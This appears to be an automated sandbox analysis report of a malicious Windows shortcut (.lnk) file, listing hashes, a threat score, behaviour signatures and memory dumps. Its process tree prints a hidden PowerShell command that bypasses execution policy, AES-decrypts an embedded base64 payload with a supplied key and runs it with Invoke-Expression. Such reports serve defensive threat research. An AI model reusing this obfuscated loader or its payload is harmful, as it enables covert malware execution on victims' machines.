Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2024 03:06

General

  • Target

    b488b9f29cb8897a1854ca1ec2e943c99ab6724a825bfedf5485f147be6a9387.lnk

  • Size

    3KB

  • MD5

    b34d7dcf2fd1a08025934b2b3b60c4d3

  • SHA1

    2d892b1de088baed8ae4df89536b7e197ea7d83e

  • SHA256

    b488b9f29cb8897a1854ca1ec2e943c99ab6724a825bfedf5485f147be6a9387

  • SHA512

    03bcf8eb554b5fcab7f843f3841c20a2a008d3dbdc5904577935122ff2c1fd86c975d9aaec6faaf9ed36354af663deaba39901fe4da700c74e8c4cead605cacd

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\b488b9f29cb8897a1854ca1ec2e943c99ab6724a825bfedf5485f147be6a9387.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2276
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {param($a, $b) $KEYIV = 'k8XdzE5Qhcf2e9Ywp4VEDqcIiZgSnG82lQkfyUvgczlI5FEX7EEuaglnm6Og2iToSvxZ25pJBaUqiOYYZt6y2P51jaT8vBYceYxEgCkXencCyumIw0vb4ZDdW5f6FFU324g2HYnIZntCYhBhzD4wsQotd4P21kmAvwOoqsWXrDjj4tpcToqBzGtbJ5NOCsqJL8hpXhz7IUR1CFpqj7uKYt030bDNEw3'; $command = [System.Convert]::FromBase64String($a); $key = [System.Convert]::FromBase64String($b); $e = New-Object System.Security.Cryptography.AesManaged; $e.Key = $key; $e.IV = $command[0..15]; $f = $e.CreateDecryptor(); $g = $f.TransformFinalBlock($command[16..$command.Length], 0, $command.Length - 16); $h = [System.Text.Encoding]::UTF8.GetString($g); Invoke-Expression $h; }" -a "g1lXULknt2tFEJ9CWtSeuT8lpwEFw2kduv2dAdXnBvW9zQWYvllyH1IzQb17QpM0MRSxRM4iBrzRGSVUzbA9Lntnw+3R6C6XzbKH3sKg0xA54U4USXwc36MuqEzwr69ZA9nW8flo9QFTCFNjo4y1kIOULkZXzZGC6QAav/ljI5Z7Zf78xpG6FK5NMvelcmgXJwECeHMCAZ5vOxfjBw1m5XEmuUeL2eLSYegw3J5rGeo=" -b "jgM16vyg07nuWc5iJFexQsYoNWWiseIKj/77y2lZRJg="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2984

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2984-38-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

    Filesize

    4KB

  • memory/2984-39-0x000000001B5B0000-0x000000001B892000-memory.dmp

    Filesize

    2.9MB

  • memory/2984-40-0x0000000002850000-0x0000000002858000-memory.dmp

    Filesize

    32KB

  • memory/2984-41-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2984-42-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2984-43-0x0000000002D54000-0x0000000002D57000-memory.dmp

    Filesize

    12KB

  • memory/2984-45-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

  • memory/2984-44-0x0000000002D5B000-0x0000000002DC2000-memory.dmp

    Filesize

    412KB